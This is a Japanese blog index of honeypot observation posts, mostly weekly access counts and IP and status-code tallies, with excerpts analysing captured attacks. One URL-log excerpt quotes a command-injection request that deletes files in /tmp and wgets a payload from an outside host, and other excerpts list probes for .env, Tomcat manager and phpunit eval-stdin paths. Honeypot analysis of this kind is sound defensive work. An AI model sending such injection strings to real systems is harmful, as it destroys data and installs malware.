ハニーレポート

ハニーポット観測レポートを中心に書いていきます。

ハニーポットレポート

週刊ハニーレポート20220918号

2022年9月12日から9月18日までのハニーポットへのアクセス記録をレポートします。 デイリーアクセス 日付 アクセス数 2022-09-12 51 2022-09-13 84 2022-09-14 97 2022-09-15 85 2022-09-16 194 2022-09-17 72 2022-09-18 65 ipアドレス別アクセス…

週刊ハニーポット20220911号

今週のハニーポットアクセスをレポートします。 デイリーアクセス 日付 アクセス数 2022-09-03 4 2022-09-04 140 2022-09-05 100 2022-09-06 82 2022-09-07 229 2022-09-08 239 2022-09-09 528 2022-09-10 249 2022-09-11 155 ipアドレス別アクセス数 IPアド…

週刊ハニーレポート20220905号

2022年8月28日から〜9月3日のハニーポットアクセスレポート。 デイリーアクセス 日付 アクセス数 2022-08-28 35 2022-08-29 879 2022-08-30 371 2022-08-31 384 2022-09-01 976 2022-09-02 62 2022-09-03 68 IPアドレス別アクセス数 IPアドレス ア…

週刊ハニーレポート20220828号

デイリーアクセス 80〜100程度のアクセスが続く週となりました。 日付 アクセス 2022-08-21 7 2022-08-22 70 2022-08-23 103 2022-08-24 81 2022-08-25 84 2022-08-26 79 2022-08-27 105 2022-08-28 95 このラインより上のエリアが無料で表示されます。 IPア…

週刊ハニーレポート20220821号

今週(8/14~8/21)のハニーポットへのアクセスをレポートします。 お盆の時期のハニーポットへのアクセスは8/14と8/21にアクセスが多くなりました。 デイリーアクセス ipアドレス別アクセス数 ステータスコード別アクセス数 HTTPメソッド別アクセス数 参考書籍…

週刊ハニーレポート20220814号

2022年8月7日〜8月13日のハニーポットへのアクセスログをレポートします。今週は月曜、土曜日にアクセスが多くなりました。 デイリーアクセス 日付 アクセス数 2022-08-07 1 2022-08-08 170 2022-08-09 68 2022-08-10 83 2022-08-11 80 2022-08-12 58 2022-0…

週刊ハニーレポート8月7日号

7月31日から8月7日のハニーポットアクセスログ集計を報告します。 デイリーアクセス 2022-07-31 41 2022-08-01 56 2022-08-02 100 2022-08-03 87 2022-08-04 159 2022-08-05 116 2022-08-06 84 2022-08-07 85 ipアドレス別アクセス数 182.234.79.223 10…

週刊ハニーレポート7月24日号

7月17日から7月24日のハニーポットアクセスログ集計を報告します。今週も落ち着いたアクセスになっています。 デイリーアクセス数 2022-07-17 32 2022-07-18 70 2022-07-19 99 2022-07-20 59 2022-07-21 76 2022-07-22 64 2022-07-23 189 2022-07-24 8…

週刊ハニーレポート7月10日号

7月3日〜7月12日のハニーポットアクセスログ集計を報告します。 デイリーアクセスログ 今週は落ち着いたアクセス数です。 2022-07-03 9 2022-07-04 81 2022-07-05 56 2022-07-06 188 2022-07-07 82 2022-07-08 69 2022-07-09 199 2022-07-10 58 2022-07…

週刊ハニーレポート6月28日号

今週のハニーポットアクセスログです。 デイリーアクセス ipアドレス別アクセス数 ステータスコード別 HTTPリクエスト別 参考書籍 デイリーアクセス 今週はおとなしいアクセスになりました。 2022-06-21 83 2022-06-22 72 2022-06-23 63 2022-06-25 58 2022-…

週刊ハニーレポート6月5日号

ハニーポットへのアクセス状況。 アクセス数 ipアドレス別アクセス ステータスコード別 HTTPリクエスト別 アクセス数 2022-05-29 43 2022-05-30 277 2022-05-31 119 2022-06-01 625 2022-06-02 113 2022-06-03 110 2022-06-04 94 2022-06-05 2094 ipアドレス…

ハニーレポート5月29日号

5月22日から5月29日のハニーポットのアクセス状況をレポートします。 今週は意外にも週明けの平日にアクセスが集中しました。 首脳会談があった日ですが影響しているのでしょうか? アクセス数 2022-05-22 24 2022-05-23 456 2022-05-24 2104 2022-05-…

週刊ハニーレポート5月22日号

5月15日から5月22日までのハニーポットへのアクセスをまとめました。 アクセス数 5月20日にアクセスが急激に多くなりました。 daily access count 2022-05-15 26 2022-05-16 53 2022-05-17 103 2022-05-18 66 2022-05-19 114 2022-05-20 2078 2022-…

週刊ハニーレポート5月8日号

今週のハニーポットへのアクセス状況をお知らせします。 アクセス数 ipアドレス別アクセス数 ステータスコード別アクセス数 HTTPメソッド別カウント 参考書籍 アクセス数 今週は落ち着いたアクセス数になりました。 daily access count 2022-05-01 3 2022-05…

週刊ハニーレポート5月1日号

5月1日週のハニーポットアクセス状況はこちら! 週刊アクセス数 ipアドレス別アクセス数 URL別アクセス数 HTTPステータスコード HTTPリクエスト数 参考書籍 週刊アクセス数 4月30日ゴールデンウィークの始まりにアクセスが多いですね。乗っ取れそうなサ…

週刊ハニーレポート4月25日号

今週のハニーポットアクセス状況をレポートします。 週刊アクセス数 4月24日(日)のアクセスが2000を超えて高くなっています。また4月18日(月)も416アクセスと高くなっています。 2022-04-17 24 2022-04-18 416 2022-04-19 69 2022-04-20 77 2022-0…

週刊ハニーレポート4月17日号

4月10日〜4月17日のハニーポットアクセスログをレポートします。 アクセス数 IPアドレス別アクセス数 ステータスコード レスポンスコード 参考書籍 アクセス数 4月17日(日)のアクセスが2000を超えています。そのほかは落ち着いた1週間となりまし…

週刊ハニーレポート4月10日号

4月3日〜4月10日までのハニーポットへのアクセスログをレポートします。 アクセス数 IPアドレス別アクセス数 HTTPリクエストメソッド集計 HTTPステータスコード集計 アクセス数 4月8日、4月9日に2000を超えるアクセスが来ています。その他のアクセ…

週刊ハニーレポート4月3日号

3月27日から4月3日のハニーポットへのアクセスをレポートします。 週刊アクセス数 3月29日、30日、4月3日にアクセスが2000を超えています。 ipアドレスアクセス数 今週アクセスしてきたipアドレス別のアクセス数です。下記3つのipアドレス…

週刊ハニーレポート3月27日号

3月20日〜3月27日までのハニーポットへのアクセスレポート。 アクセス数 ipアドレス別アクセス数 HTTPリクエストメソッド HTTPステータスコード HTTP アクセスURL数 ハニーポット参考書籍 アクセス数 週刊アクセス数です。今週は100程度のアクセス…

週刊ハニーレポート3/20日号

3月15日〜3月20日のハニーポットのログのサマリーをレポートします。 デイリーアクセス HTTPアクセス HTTPステータスコード HTTPリクエスト ipアドレス別アクセス数トップ10 ハニーポット参考書籍 デイリーアクセス 3月16日、17日にアクセスが…

wgetしてくるやつを抽出するよ!

ハニーポットのログを自動集計してcsvファイルに保存し、自分のPCに転送するスクリプトを作成していました。しかし、ログ作成部分のスクリプトはエラーで最後にログファイルをリフレッシュする部分は動くのでちょうどログファイルだけ消えるという珍事により…

3/3の攻撃ログ分析 xmlのメッセージの中に禁止用語が!

今日来た攻撃の中から1件取り出して分析します。 今日来たアクセスのデータは以下になります。 アクセスログデータ POST /xmlrpc.php HTTP/1.1 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0 Content-Length: …

やってしまったぁぁぁぁ!

月初めでログを集計するスクリプトが動いてるか確認する時に間違えて、コマンドを打ってしまいログが消えました・・・ 上ボタンで過去に打ったコマンドを使おうとして、放ったコマンド。 $ sed -i '' -e 'd' hoge.txt ログファイルが消えてった・・・・ 今月…

初めての201リクエストが来たから調べたらやばいところからだった

ハニーポットを構築してからほとんどがGETリクエストでとりあえずつつく攻撃でしたので200レスポンスかログインアクセスをしてくるレスポンスとして401がほとんどでした。 本日のログに初めて201レスポンスを返す攻撃が来ました。 HTTPリクエストに関しては…

はるばるパナマからの大量アクセスwww

2月15日、16日に1000を超えるアクセスがありました。 ipアドレスを日別で集計すると犯人が見つかりました。下記が集計結果です。 2001 2022-02-16 201.218.229.228 2001 2022-02-15 201.218.229.228 1650 2022-02-16 210.210.26.37 541 2022-02-09 60.2…

OSコマンドインジェクションいただきました

下記のログを分析していくよ! 6350 /manager/html 462 / 157 /xmlrpc.php 85 /.env 42 /autodiscover 27 91.218.66.202:4444 27 /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 19 /favicon.ico 17 /shell?cd+/tmp;rm+-rf+*;wget+%20botaflatoon.syt…

URLログ分析 圧倒的管理者権限を取りにイクゥ!

ハニーポットのアクセスログを見ていきます。 ログの集計期間は2/3〜2/16です。 アクセスログの中から10アクセス以上のURLを抽出しました。 6350 /manager/html 462 / 157 /xmlrpc.php 85 /.env 42 /autodiscover 27 91.218.66.202:4444 27 /vendor/phpunit/…

今週のアクセス2/3-2/13

ハニーポットを植えてから10日ほど経ちました。アクセス数を見ます。2月9日のアクセスが急激に伸びてます。基本的には土日のアクセスが多そうですね。急激なアクセスの後はアクセス数70程度で推移しています。この日に何が起きていたのでしょう?? 次…

クラウドサービスからのアクセス!?

今日来たアクセスを分析していきます。 ログの中から下記アクセスを見ていきます。 167.94.146.59 XXXXXXXXXXX "GET / HTTP/1.1" 200 False ※XXXXはマスクしてあります。 167.94.146.59のGETアクセスをしてきています。 base64でエンコードされている部分を…